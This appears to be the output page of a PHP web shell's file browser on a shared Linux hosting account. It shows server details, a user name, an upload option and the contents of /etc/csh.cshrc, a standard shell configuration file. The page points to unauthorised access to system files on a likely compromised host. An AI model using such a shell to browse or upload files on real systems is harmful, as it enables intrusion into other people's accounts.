HEX
Server: Apache
System: Linux pdx1-shared-a1-11 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: mollywopper (10344313)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //etc/csh.cshrc

# /etc/csh.cshrc: system-wide .cshrc file for csh(1) and tcsh(1) if ($?tcsh && $?prompt) then bindkey "\e[1~" beginning-of-line # Home bindkey "\e[7~" beginning-of-line # Home rxvt bindkey "\e[2~" overwrite-mode # Ins bindkey "\e[3~" delete-char # Delete bindkey "\e[4~" end-of-line # End bindkey "\e[8~" end-of-line # End rxvt set autoexpand set autolist set prompt = "%U%m%u:%B%~%b%# " endif set dir=/etc/csh/cshrc.d if (-e $dir && `/bin/ls $dir` != "") then foreach FILE (`/bin/ls $dir/*`) source $FILE; end; endif